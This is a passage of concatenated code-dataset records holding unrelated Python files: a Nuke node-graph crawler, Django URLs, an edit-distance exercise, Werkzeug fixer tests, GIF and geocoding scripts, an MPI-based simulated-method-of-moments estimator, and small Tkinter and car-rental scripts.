[nodes]\n below_nodes = []\n distances = []\n dist = 0\n while len(nodes) > 0:\n new_nodes = down(nodes, pipe=pipe)\n new = filter(lambda a: a not in below_nodes, new_nodes)\n if len(new) == 0:\n break\n for n in new:\n if n not in below_nodes:\n below_nodes.append(n)\n distances.append(dist)\n nodes = new\n dist += 1\n if dist_return:\n below_nodes = zip(below_nodes, distances)\n return below_nodes\n\n# ------------------------------------------------- Hierarchical Distance -- #\n# TODO: this section needs updating\ndef first_common_descent(nodes=None, pipe=None):\n \"\"\"returns the first down-chain node common to the given nodes\n (NOT IMPLEMENTED!)\n 
\"\"\"\n nodes = nodes if nodes else nuke.selectedNodes()\n node_lists = [below(n, pipe=pipe) for n in nodes]\n if len(node_lists) > 1:\n int_set = set(node_lists[0])\n for nl in node_lists[1:]:\n int_set.intersection_update(nl)\n tup_list = [(len(above(n, pipe=pipe)), n) for n in int_set]\n tup_list.sort()\n if tup_list:\n return tup_list[0][1]\n else:\n return []\n else:\n return []\n\ndef dist_between(anode, bnode, pipe=None):\n \"\"\"returns the connected distance between two nodes\"\"\"\n a_node_above = above(anode, pipe=pipe)\n b_node_above = above(bnode, pipe=pipe)\n dist = None\n if anode in b_node_above:\n above_tups = above(bnode, dist_return=True, pipe=pipe)\n above_tups.sort(key=lambda x: x[1])\n for distTup in above_tups:\n if anode == distTup[0]:\n dist = distTup[1]\n elif bnode in a_node_above:\n above_tups = above(anode, dist_return=True, pipe=pipe)\n above_tups.sort(key=lambda x: x[1])\n for distTup in above(anode, dist_return=True, pipe=pipe):\n if bnode == distTup[0]:\n dist = distTup[1]\n else:\n common_desc = first_common_descent((anode, bnode))\n if common_desc:\n distA = dist_between(anode, common_desc, pipe=pipe)\n distB = dist_between(bnode, common_desc, pipe=pipe)\n dist = distA + distB\n else:\n dist = None\n return dist\n\ndef nodes_between(anode, bnode, pipe=None):\n \"\"\"returns the list of nodes connecting two nodes\n (NOT IMPLEMENTED!)\n \"\"\"\n a_node_above = above(anode, pipe=pipe)\n b_node_above = above(bnode, pipe=pipe)\n nodes_btwn = None\n if anode in b_node_above:\n nodes_btwn = list(set(below(anode, pipe=pipe)) & set(b_node_above))\n elif bnode in a_node_above:\n nodes_btwn = list(set(below(bnode, pipe=pipe)) & set(a_node_above))\n else:\n common_desc = first_common_descent((anode, bnode), pipe=pipe)\n if common_desc:\n nodes_a = nodes_between(anode, common_desc, pipe=pipe)\n nodes_b = nodes_between(bnode, common_desc, pipe=pipe)\n nodes_btwn = nodes_a.extend(nodes_b)\n return nodes_btwn\n else:\n nodes_btwn = None\n return 
nodes_btwn\n\n# ------------------------------------------------------- Script Specific -- #\ndef main_comp():\n \"\"\"returns a list of all nodes in the largest tree in the comp,\n assumed to be the main comp\"\"\"\n all_nodes = nuke.allNodes('Write')\n above_nodes = []\n above_nodes = [(above(n), n) for n in all_nodes]\n main_comp = max(above_nodes, key=lambda x: len(x[0]))\n main_comp_nodes = main_comp[0]\n main_comp_nodes.reverse()\n main_comp_nodes.append(main_comp[1])\n return main_comp_nodes\n\ndef full_comp():\n \"\"\"return all the nodes connected to the comp, even if they don't contribute\n to the final output.\"\"\"\n main_tree_nodes = main_comp()\n all_nodes_ = nuke.allNodes()\n culled_nodes = [n for n in all_nodes_ if n not in main_tree_nodes]\n non_comp_nodes = [n for n in culled_nodes\n if any((abv in main_tree_nodes)\n for abv in above(nodes=n))]\n for node in list(non_comp_nodes):\n non_comp_nodes.extend(above(node))\n return list(set(non_comp_nodes))\n\n# ------------------------------------------------------- Sorting Methods -- #\ndef sorted_hierarchy(nodes):\n \"\"\"sorts the given nodes by hierarchical order. Assumes all nodes\n are in the same chain\"\"\"\n def sorter(node):\n return len([n for n in above(node) if n in nodes])\n return sorted(nodes, key=sorter)\n\n# ------------------------------------------------------- Group Hierarchy -- #\ndef parent(node=None):\n return nuke.toNode('.'.join(node.fullName().split('.')[:-1])) or nuke.root()\n","sub_path":"plutonium/core/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542401139","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = \"courses_app\"\nurlpatterns = [\n url(r'^create_comment/(?P\\d+)$',views.create_comment),\n url(r'^courses/destroy/destroy_course/(?P\\d+)$', views.destroy_course),\n url(r'^destroy_course/(?P\\d+)$', views.destroy_course),\n url(r'^courses/destroy/(?P\\d+)$', views.destroy_course),\n url(r'^create$', views.create_course),\n url(r'^$', views.index)\n ]\n","sub_path":"apps/courses_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519884420","text":"#COMP 363 Assignment 11\n#Thomas Walsh\n\ntargetWord = ''\ngivenWord = ''\ntargetIndex = 0\ngivenIndex = 0\nsolution = []\n\ndef dynamic():\n global targetWord\n global givenWord\n global targetIndex\n global givenIndex\n global solution\n #Sets up the solution list of lists\n for x in range(targetIndex + 1):\n #Makes the right number of lists\n tempy = []\n for y in range(givenIndex + 1):\n #Adds the right number of zeros\n tempy.append(0)\n solution.append(tempy)\n #Checks each letter in target word\n for targetNum in range(targetIndex + 1):\n #Checks every letter in given word\n for givenNum in range(givenIndex + 1):\n #given word is empty\n if givenNum == 0:\n solution[targetNum][givenNum] = targetNum\n #target word is empty\n elif targetNum == 0:\n solution[targetNum][givenNum] = givenNum\n #letters match\n elif targetWord[targetNum - 1] == givenWord[givenNum - 1]:\n solution[targetNum][givenNum] = solution[targetNum - 1][givenNum - 1]\n #letters don't match\n else:\n #Checks to see whats easiest replacement, insertion, or removal\n solution[targetNum][givenNum] = 1 + min(solution[targetNum - 1][givenNum - 1], solution[targetNum][givenNum - 1], solution[targetNum - 1][givenNum])\n \ndef main():\n global targetWord\n global givenWord\n global targetIndex\n global givenIndex\n global solution\n targetWord = 'loyola'\n givenWord = 'crayola'\n targetIndex = 
len(targetWord)\n givenIndex = len(givenWord)\n dynamic()\n print(solution[targetIndex][givenIndex])\n\nmain()\n","sub_path":"COMP363A11/WALSH_11.1B.py","file_name":"WALSH_11.1B.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"577342684","text":"class WorldNode:\n def __init__(self, name):\n self.name = name\n self.children = {}\n self.parent = None\n self.depth = 0\n self.text = \"\"\n\n @property\n def display_name(self):\n return self.name.strip(\"#\")\n\n def add_child(self, node):\n if node.name in self.children:\n print(\"{} already exists.\".format(node.name))\n self.children[node.name] = node\n node.parent = self\n node.depth = self.depth + 1","sub_path":"toolkits/md2xml/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167011755","text":"from werkzeug.contrib import fixers\nfrom werkzeug.datastructures import ResponseCacheControl\nfrom werkzeug.http import parse_cache_control_header\nfrom werkzeug.test import Client\nfrom werkzeug.test import create_environ\nfrom werkzeug.wrappers import Request\nfrom werkzeug.wrappers import Response\n\n\n@Request.application\ndef path_check_app(request):\n return Response(\n \"PATH_INFO: %s\\nSCRIPT_NAME: %s\"\n % (request.environ.get(\"PATH_INFO\", \"\"), request.environ.get(\"SCRIPT_NAME\", \"\"))\n )\n\n\nclass TestServerFixer(object):\n def test_cgi_root_fix(self):\n app = fixers.CGIRootFix(path_check_app)\n response = Response.from_app(\n app, dict(create_environ(), SCRIPT_NAME=\"/foo\", PATH_INFO=\"/bar\")\n )\n assert response.get_data() == b\"PATH_INFO: /bar\\nSCRIPT_NAME: \"\n\n def test_cgi_root_fix_custom_app_root(self):\n app = fixers.CGIRootFix(path_check_app, app_root=\"/baz/\")\n response = Response.from_app(\n app, dict(create_environ(), SCRIPT_NAME=\"/foo\", 
PATH_INFO=\"/bar\")\n )\n assert response.get_data() == b\"PATH_INFO: /bar\\nSCRIPT_NAME: baz\"\n\n def test_path_info_from_request_uri_fix(self):\n app = fixers.PathInfoFromRequestUriFix(path_check_app)\n for key in \"REQUEST_URI\", \"REQUEST_URL\", \"UNENCODED_URL\":\n env = dict(create_environ(), SCRIPT_NAME=\"/test\", PATH_INFO=\"/?????\")\n env[key] = \"/test/foo%25bar?drop=this\"\n response = Response.from_app(app, env)\n assert response.get_data() == b\"PATH_INFO: /foo%bar\\nSCRIPT_NAME: /test\"\n\n def test_header_rewriter_fix(self):\n @Request.application\n def application(request):\n return Response(\"\", headers=[(\"X-Foo\", \"bar\")])\n\n application = fixers.HeaderRewriterFix(\n application, (\"X-Foo\",), ((\"X-Bar\", \"42\"),)\n )\n response = Response.from_app(application, create_environ())\n assert response.headers[\"Content-Type\"] == \"text/plain; charset=utf-8\"\n assert \"X-Foo\" not in response.headers\n assert response.headers[\"X-Bar\"] == \"42\"\n\n\nclass TestBrowserFixer(object):\n def test_ie_fixes(self):\n @fixers.InternetExplorerFix\n @Request.application\n def application(request):\n response = Response(\"binary data here\", mimetype=\"application/vnd.ms-excel\")\n response.headers[\"Vary\"] = \"Cookie\"\n response.headers[\"Content-Disposition\"] = \"attachment; filename=foo.xls\"\n return response\n\n c = Client(application, Response)\n response = c.get(\n \"/\",\n headers=[\n (\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\")\n ],\n )\n\n # IE gets no vary\n assert response.get_data() == b\"binary data here\"\n assert \"vary\" not in response.headers\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n assert response.headers[\"content-type\"] == \"application/vnd.ms-excel\"\n\n # other browsers do\n c = Client(application, Response)\n response = c.get(\"/\")\n assert response.get_data() == b\"binary data here\"\n assert \"vary\" in response.headers\n\n cc = 
ResponseCacheControl()\n cc.no_cache = True\n\n @fixers.InternetExplorerFix\n @Request.application\n def application(request):\n response = Response(\"binary data here\", mimetype=\"application/vnd.ms-excel\")\n response.headers[\"Pragma\"] = \", \".join(pragma)\n response.headers[\"Cache-Control\"] = cc.to_header()\n response.headers[\"Content-Disposition\"] = \"attachment; filename=foo.xls\"\n return response\n\n # IE has no pragma or cache control\n pragma = (\"no-cache\",)\n c = Client(application, Response)\n response = c.get(\n \"/\",\n headers=[\n (\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\")\n ],\n )\n assert response.get_data() == b\"binary data here\"\n assert \"pragma\" not in response.headers\n assert \"cache-control\" not in response.headers\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n\n # IE has simplified pragma\n pragma = (\"no-cache\", \"x-foo\")\n cc.proxy_revalidate = True\n response = c.get(\n \"/\",\n headers=[\n (\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\")\n ],\n )\n assert response.get_data() == b\"binary data here\"\n assert response.headers[\"pragma\"] == \"x-foo\"\n assert response.headers[\"cache-control\"] == \"proxy-revalidate\"\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n\n # regular browsers get everything\n response = c.get(\"/\")\n assert response.get_data() == b\"binary data here\"\n assert response.headers[\"pragma\"] == \"no-cache, x-foo\"\n cc = parse_cache_control_header(\n response.headers[\"cache-control\"], cls=ResponseCacheControl\n )\n assert cc.no_cache\n assert cc.proxy_revalidate\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n","sub_path":"tests/contrib/test_fixers.py","file_name":"test_fixers.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"589303521","text":"# _*_ coding:utf-8 _*_\nfrom PIL import Image, ImageSequence\n\nimgname = 'C:\\工作\\gif动图逆序播放\\科比投篮动图.'\nim = Image.open(imgname + '.gif')\n# 初始化列表\nsequence = []\n#在图像序列中遍历所有帧\ni= 1\nfor f in ImageSequence.Iterator(im):\n sequence.append(f.copy())\n f.save(imgname + '分解'+ str(i) + '.png')#文件名需要有后缀,知道什么格式\n i += 1\n# 将图像序列逆转\nsequence.reverse()\n\n#几张单的gif组合成动态图片\n#im.save(out, save_all = True, append_images=[im1, im2......]),这边的im只需要是Image对象即可\nsequence[0].save(r'C:\\工作\\gif动图逆序播放\\动图逆序.gif', save_all=True, append_images=sequence[0:], duration=30)#sequence[0]为Image对象,[1][2]…都可以\n","sub_path":"gif逆序播放.py","file_name":"gif逆序播放.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"134264317","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\nimport reverse_geocoder as rg\nimport sqlite3\n\ntry:\n csvfilename = sys.argv[1]\nexcept IndexError:\n print(\"Usage %s \" % sys.argv[0])\n exit(1)\n\nconn = sqlite3.connect('videos.db')\nc = conn.cursor()\nc.execute(\"CREATE TABLE IF NOT EXISTS videos (longitude float, latitude float, time datetime, id text PRIMARY KEY, country text, state text, city text)\")\n\n# first pass: build database\nwith open(csvfilename, newline='') as csvfile:\n for i, row in enumerate(csv.reader(csvfile)):\n if (i!=0):\n c.execute(\"REPLACE INTO videos (longitude, latitude, time, id) VALUES (?,?,?,?)\", row)\n conn.commit()\n\n# second pass: local geocode\nrows = [row for row in c.execute(\"SELECT latitude,longitude,id FROM videos ORDER BY id\")]\ngeos = rg.search([(row[0], row[1]) for row in rows ])\n\n# third pass: save geocoding\nfor r, row in enumerate(rows):\n g = geos[r]\n if g['admin1'] == 'Washington, D.C.':\n g['admin1'] = \"DC\"\n g['name'] = \"Washington\"\n c.execute(\"UPDATE videos SET country=?, state=?, city=? 
WHERE id=?\", ( g['cc'], g['admin1'], g['name'], row[2] ))\n conn.commit()\n print(g['cc'], g['admin1'], g['name'], row[2])","sub_path":"geocode.py","file_name":"geocode.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"166096124","text":" \n\"\"\"\nModule estiamates HousingModel using Simualted Method of Moments\nMinimisation performed using Cross-Entropy method (see Kroese et al)\n\nScript must be run using Mpi: \n\nExample (on Gadi):\n\nmodule load python3/3.7.4\nmodule load openmpi/4.0.2\n\nalias mpython='mpiexec -np 480 `which python3`'\n \nmpython SMM.py\n\n\"\"\"\n\n# import packages\n\nimport numpy as np\nimport time\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\n\nfrom collections import defaultdict\nfrom numpy import genfromtxt\nimport csv\nimport time\nimport dill as pickle \nfrom randparam import rand_p_generator\nimport copy\nimport sys\nimport pandas as pd\n\nfrom profiles_moments import genprofiles_operator, gen_moments, sortmoments\nfrom housing_functions import housingmodel_function_factory\nfrom egg_basket import HousingModel, housingmodel_operator_factory\nfrom retiree_operators import housing_model_retiree_func_factory\n\nfrom pyina import mpi\nworld = mpi.world\n\nfrom mpi4py import MPI as MPI4py\ncomm = MPI4py.COMM_WORLD\n\nfrom pyina.mpi_pool import parallel_map\n\nimport gc\n\n\ndef gen_format_moments(TS1,TS2, moments_data):\n\t\"\"\"Gen simulated moments, labels\n\t\tand sorts simulated and data mooments\n\t\tand generates numpy arrays\"\"\"\n\n\tmoments_male \t= gen_moments(copy.copy(TS1),copy.copy(TS2)) \n\tmoments_female \t= gen_moments(copy.copy(TS1),copy.copy(TS2)) \n\tmoments_female \t= moments_female.add_suffix('_female')\n\tmoments_male \t= moments_male.add_suffix('_male')\n\tmoments_sim_sorted \t= sortmoments(moments_male,\\\n\t\t\t\t\t\t\t\t\t\t moments_female)\n\n\tmoments_sim_sorted \t\t= 
pd.concat([moments_male[\"Age_wave10_male\"]\\\n\t\t\t\t\t\t\t\t.reset_index().iloc[:,1],\\\n\t\t\t\t\t\t\t\tmoments_sim_sorted],\\\n\t\t\t\t\t\t\t\taxis =1) \n\tmoments_sim_sorted \t\t= moments_sim_sorted.rename(columns =\\\n\t\t\t\t\t\t\t {'Age_wave10_male':'Age_wave10'})\n\n\tmoments_data.columns \t= moments_sim_sorted.columns\n\n\t\n\tmoments_sim_sorted =\\\n\t\tmoments_sim_sorted\\\n\t\t.loc[:,moments_sim_sorted.columns.str.endswith('_male')] \n\t\n\tmoments_sim_array = np.array(np.ravel(moments_sim_sorted))\n\n\tmoments_sim_array[np.isnan(moments_sim_array)] = 0\n\n\tmoments_data =\\\n\tmoments_data.loc[:,moments_data.columns.str.endswith('_male')] \n\n\tmoments_data_array = np.array(np.ravel(moments_data))\n\n\treturn moments_sim_array, moments_data_array\n\ndef gen_RMS(parameters,lambdas,\\\n\t\t\tsurvival,\\\n\t\t\tmoments_data,\\\n\t\t\tvol_cont_points,\\\n\t\t\trisk_share_points, TSN,U):\n\t\"\"\"\n\tGenerate root mean square error \n\tbetween simulated moments for HousingModel \n\tand data moments \n\n\t\"\"\"\n\t# define functions \n\n\tfunctions = {}\n\n\tfunctions['u'], functions['uc'], functions['uh'], functions['b'], \\\n\tfunctions['b_prime'], functions['y'],functions['yvec'], functions['DB_benefit'], \\\n\tfunctions['adj_p'], functions['adj_v'], functions['adj_pi'],\\\n\tfunctions['uc_inv'],functions['uh_inv'],\\\n\t\t= housingmodel_function_factory(parameters,\\\n\t\t\t\t\t\t\t\t\t\t lambdas,\\\n\t\t\t\t\t\t\t\t\t\t normalisation)\n\n\t# Create housing model \n\tog = HousingModel(functions, parameters, survival,\\\n\t\t\t\t\t\t\t\t\t\tvol_cont_points,\\\n\t\t\t\t\t\t\t\t\t\trisk_share_points)\n\t\n\t# solve model \n\tgen_R_pol = housing_model_retiree_func_factory(og)\n\n\tsolve_LC_model = housingmodel_operator_factory(og,gen_R_pol)\n\n\tpolicies \t= (solve_LC_model())\n\n\t# generate time series \n\tgenerate_TSDF = genprofiles_operator(og)\n\n\tdel og\n\tgc.collect() \n\n\tTS1, TS2 = generate_TSDF(U,TSN, *policies)\n\n\t# generate and sort 
moments\n\n\tmoments_sim_array, moments_data_array \\\n\t= gen_format_moments(TS1, TS2, moments_data)\n\n\tdel TS1\n\tdel TS2 \n\tgc.collect()\n\n\tdeviation = (moments_sim_array\\\n\t\t\t\t\t\t\t\t[~np.isnan(moments_data_array)]\\\n\t\t\t\t\t\t\t\t - moments_data_array\\\n\t\t\t\t\t\t\t\t [~np.isnan(moments_data_array)])\n\n\tnorm = np.sum(np.square(moments_data_array[~np.isnan(moments_data_array)]))\n\n\n\n\tN_err = len(deviation)\n\n\treturn 1-np.sqrt((1/N_err)*np.sum(np.square(deviation))/norm)\n\ndef gen_param_moments(parameter_list_dict, param_random_bounds,\\\n\t\t\t\t\t\t selected, weights):\n\n\t\"\"\" Estiamate params of a sampling distribution\n\n\tParameters\n\t----------\n\tparameter_list_dict: Dict\n\t\t\t\t\t\t Dictionary with all paramameters\n\t\t\t\t\t\t with ID keys\n\tselected : 2D-array\n\t\t\t\t\t\t set of elite paramters IDs and errors\n\n\tReturns\n\t-------\n\n\tmeans\n\n\tcov\n\t\"\"\"\n\n\tsample_params = []\n\n\tfor i in range(len(selected)):\n\t\trand_params_i = []\n\t\tfor key in param_random_bounds.keys():\n\t\t\trand_params_i.append(\\\n\t\t\t\tparameter_list_dict[int(selected[i,0])][key])\n\t\t\n\t\tsample_params.append(rand_params_i)\n\n\tsample_params = np.array(sample_params)\n\tmeans = np.average(sample_params, weights = weights, axis=0)\n\tcov = np.cov(sample_params, aweights =weights, rowvar=0)\n\n\treturn means, cov\n\n\nif __name__ == \"__main__\":\n\n\n\n\tnormalisation = np.array([1E-5, 100])\n\tparam_deterministic = {}\n\tparam_random_bounds = {}\n\n\tsettings_folder = '/home/141/as3442/Retirementeggs/settings'\n\n\n\t# un-pack model settings \n\n\twith open('{}/parameters_EGM_base.csv'.format(settings_folder),\\\n\t\tnewline='') as pscfile:\n\t\treader = csv.DictReader(pscfile)\n\t\tfor row in reader:\n\t\t\tparam_deterministic[row['parameter']] = np.float64(row['value'])\n\n\twith open('{}/random_param_bounds.csv'\\\n\t\t.format(settings_folder), newline='') as pscfile:\n\t\treader_ran = csv.DictReader(pscfile)\n\t\tfor 
row in reader_ran:\n\t\t\tparam_random_bounds[row['parameter']] = np.float64([row['LB'],\\\n\t\t\t\trow['UB']])\n\n\tlambdas = genfromtxt('{}/lambdas_male.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[1:]\n\tsurvival = genfromtxt('{}/survival_probabilities_male.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[0:]\n\tvol_cont_points = genfromtxt('{}/vol_cont_points.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[1:]\n\trisk_share_points = genfromtxt('{}/risk_share_points.csv'.\\\n\t\t\t\t\t\t\tformat(settings_folder), delimiter=',')[1:]\n\t\n\n\t# load and prepare data moments \n\tmoments_data = pd.read_csv('{}/moments_data.csv'\\\n\t\t\t\t\t.format(settings_folder))\n\tmoments_data = moments_data.drop('Unnamed: 0', axis=1) \n\n\t# run SMM estimation \n\n\ttol \t= 1E-8\n\tTSN \t= 150\n\tN_elite = 45\n\td \t= 3\n\n\tstart = time.time()\n\t# pick previous parameters settings and means\n\tgamma_XEM \t= pickle.load(open(\"/scratch/pv33/gamma_XEM.smms\",\"rb\"))\n\tS_star \t\t= pickle.load(open(\"/scratch/pv33/S_star.smms\",\"rb\"))\n\tt \t\t\t= pickle.load(open(\"/scratch/pv33/t.smms\",\"rb\"))\n\n\tsampmom \t= pickle.load(open(\"/scratch/pv33/latest_means_iter.smms\",\"rb\"))\n\n\t# generate new parameter sample (each worker generates a random sample)\n\n\tif t ==0:\n\t\tinitial =0\n\telse:\n\t\tinitial = 0\n\n\tparameters = rand_p_generator(param_deterministic,\\\n\t\t\t\t\t\t\t\tparam_random_bounds, deterministic = 0,\\\n\t\t\t\t\t\t\t\tinitial =initial,\\\n\t\t\t\t\t\t\t\tparam_random_means = sampmom[0],\\\n\t\t\t\t\t\t\t\tparam_random_cov = sampmom[1])\n\n\tt = t+1\n\n\tindexed_errors = None\n\tparameter_list = None\n\n\t# eval model on each worker \n\tif world.rank ==0:\n\t\tprint(\"Distributng iter {}\".format(t))\n\t\terrors_ind = [0,0]\n\telse:\n\t\tdef SMM_objective():\n\t\t\t\"\"\"SMM objective to be maximised \n\t\t\tas function of params\"\"\"\n\t\t\tparameters_all = parameters\n\t\t\tU = 
pickle.load(open(\"/scratch/pv33/seed_U.smms\",\"rb\")) \n\t\t\t#U = np.random.rand(6,100,TSN,100) \n\t\t\tRMS = gen_RMS(parameters_all,lambdas,\\\n\t\t\t\t\t\tsurvival,\\\n\t\t\t\t\t\tmoments_data,\\\n\t\t\t\t\t\tvol_cont_points,\\\n\t\t\t\t\t\trisk_share_points,TSN,U)\n\n\t\t\treturn [parameters_all['ID'], RMS]\n\t\terrors_ind = SMM_objective()\n\t\tdel SMM_objective\n\t\tgc.collect()\n\n\tcomm.Barrier()\n\tindexed_errors \t= comm.gather(errors_ind, root=0)\n\tparameter_list \t= comm.gather(parameters, root=0)\n\n\t# master does calculations\n\t\n\tif world.rank ==0:\n\t\tparameter_list_dict = dict([(param['ID'], param)\\\n\t\t\t\t\t\t\t for param in parameter_list[1:]])\n\t\tindexed_errors_arr = np.array(indexed_errors[1:])\n\t\tindexed_errors_arr = indexed_errors_arr[np.argsort(\\\n\t\t\t\t\t\t\t\t\t-indexed_errors_arr[:,1])]\n\t\tnumber_N \t\t\t\t= len(indexed_errors_arr) - np.sum(np.isnan(indexed_errors_arr[:,1]))\n\n\n\t\telite_errors_indexed = indexed_errors_arr[0: N_elite]\n\n\t\tweights \t\t\t\t= np.exp((elite_errors_indexed[:,1] - np.min(elite_errors_indexed[:,1]))\\\n\t\t\t\t\t\t\t\t\t\t/ (np.max(elite_errors_indexed[:,1]) -np.min(elite_errors_indexed[:,1])))\n\n\n\t\tgamma_XEM = np.append(gamma_XEM,\\\n\t\t\t\t\t\t\t\t\t elite_errors_indexed[-1, 1])\n\t\tS_star = np.append(S_star,\\\n\t\t\t\t\t\t\t\t\t elite_errors_indexed[0, 1])\n\n\t\terror_gamma = gamma_XEM[d +t-1] \\\n\t\t\t\t\t\t\t\t\t- gamma_XEM[d +t -2]\n\t\terror_S = S_star[int(d +t-1)]\\\n\t\t\t\t\t\t\t\t\t- S_star[int(d +t -2)]\n\n\t\tprint(\"...iteration {} on {} cores, elite_gamma error are {} and elite S error are {}\"\\\n\t\t\t.format(t, number_N, error_gamma, error_S))\n\n\t\tconvg = int(np.abs(max(S_star[-d:]) - min(S_star[-d:]))< tol)\n\n\t\tprint(\"...stop_error is {}, convergence is {}\".format(np.abs(max(S_star[-d:]) - min(S_star[-d:])), convg))\n\n\t\tmeans, cov = gen_param_moments(parameter_list_dict,\\\n\t\t\t\t\t\t\t\tparam_random_bounds,\\\n\t\t\t\t\t\t\t\telite_errors_indexed, 
weights)\n\n\t\tconvg_cov\t\t= int(np.abs(np.max(cov))< tol )\n\t\tprint(\"...cov error is {}, convergence is {}\".format((np.abs(np.max(cov))), convg_cov))\n\n\t\tpickle.dump([means, cov],\\\n\t\t\t\t\t\topen(\"/scratch/pv33/latest_means_iter.smms\",\"wb\"))\n\t\tpickle.dump(gamma_XEM,\\\n\t\t\t\t\t\topen(\"/scratch/pv33/gamma_XEM.smms\",\"wb\"))\n\t\tpickle.dump(S_star,\\\n\t\t\t\t\t\topen(\"/scratch/pv33/S_star.smms\",\"wb\"))\n\n\t\tpickle.dump(t,\\\n\t\t\t\t\t\topen(\"/scratch/pv33/t.smms\",\"wb\"))\n\t\t\n\t\tprint(\"...generated and saved sampling moments\")\n\t\tprint(\"...time elapsed: {} minutes\".format((time.time()-start)/60))\n\n","sub_path":"eggsandbaskets/smm/smm.py","file_name":"smm.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107195588","text":"# Окно с событиями\nfrom tkinter import *\n\n# Функция для события\ndef button1Click() :\n Display.config(text=\"Это радует!\")\ndef button2Click() :\n Display.config(text=\"Это огорчает!\")\n\n# Основная программа\nWindow = Tk()\nDisplay = Label(Window, text=\"Привет, как дела?\")\nDisplay.grid(row=0, column=1)\nButton1 = Button(Window, text=\"Хорошо\", command=button1Click)\nButton2 = Button(Window, text=\"Плохо\", command=button2Click)\nButton1.grid(row=2, column=0, padx=10, pady=10)\nButton2.grid(row=2, column=2, padx=10, pady=10)\nWindow.mainloop()\n\n","sub_path":"python_for_kids/book/Examples/window6.py","file_name":"window6.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68720793","text":"categories = ['brand', 'seats', 'color', 'price']\n\navailable_cars = {\n\t\n\t'impreza' : {\n\t'brand' : 'subaru',\n\t'seats' : 5,\n\t'color' : 'red',\n\t'price' : 40,\n\t},\n\n\t'mustang' : {\n\t'brand' : 'ford',\n\t'seats' : 2,\n\t'color' : 'white',\n\t'price' : 55,\n\t},\n\n\t'sonata' : {\n\t'brand' : 
'hyundai',\n\t'seats' : 5,\n\t'color' : 'silver',\n\t'price' : 35,\n\t},\n}\n\n\n\nprompt = \"Welcome to my car rental service.\"\nprompt += \"\\nWhat are you looking for in a car?\"\nprompt += \"\\n\\n- - -\"\nprompt += \"\\n\\nBrand\"\nprompt += \"\\nSeats\"\nprompt += \"\\nColor\"\nprompt += \"\\nPrice\"\nprompt += \"\\n\\nPlease type which of these is your priority: \"\n\npriority = raw_input(prompt).lower()\n\n\nif priority in categories:\n\tprint(\"\\nWe will match you with vehicles that fit with your priorities.\")\n\tprint(\"Your top priority is: \" + priority.title() + \"\\n\")\n\t\n\tif priority == 'color':\n\t\tprint(\"We have cars available in these colors:\")\n\t\tfor car, aspect in available_cars.items():\n\t\t\tprint(\"\\t\" + aspect['color'].title())\n\t\tcolor_choice = raw_input(\"\\nWhich of these colors do you prefer?\\nPlease enter your choice: \").lower()\n\t\tfor car, aspect in available_cars.items():\n\t\t\tif color_choice in aspect['color']:\n\t\t\t\tprint(\"\\nBased on your priorities, we recommend this car:\\n\" + \n\t\t\t\t\taspect['brand'].title() + \" \" + car.title() + \", with the following characteristics:\\n\" + \n\t\t\t\t\t\"Seats: \" + str(aspect['seats']) + \"\\n\" +\n\t\t\t\t\t\"Color: \" + aspect['color'].title() + \"\\n\" +\n\t\t\t\t\t\"Price: $\" + str(aspect['price']) + \" per day\"\n\t\t\t\t\t)\n\t\t\n\tif priority == 'brand':\n\t\tprint(\"We have cars available from these brands:\")\n\t\tfor car, aspect in available_cars.items():\n\t\t\tprint(\"\\t\" + aspect['brand'].title())\n\t\tbrand_choice = raw_input(\"\\nWhich of these brands do you prefer?\\nPlease enter your choice: \").lower()\n\t\tfor car, aspect in available_cars.items():\n\t\t\tif brand_choice in aspect['brand']:\n\t\t\t\tprint(\"\\nBased on your priorities, we recommend this car:\\n\" + \n\t\t\t\t\taspect['brand'].title() + \" \" + car.title() + \", with the following characteristics:\\n\" + \n\t\t\t\t\t\"Seats: \" + str(aspect['seats']) + \"\\n\" 
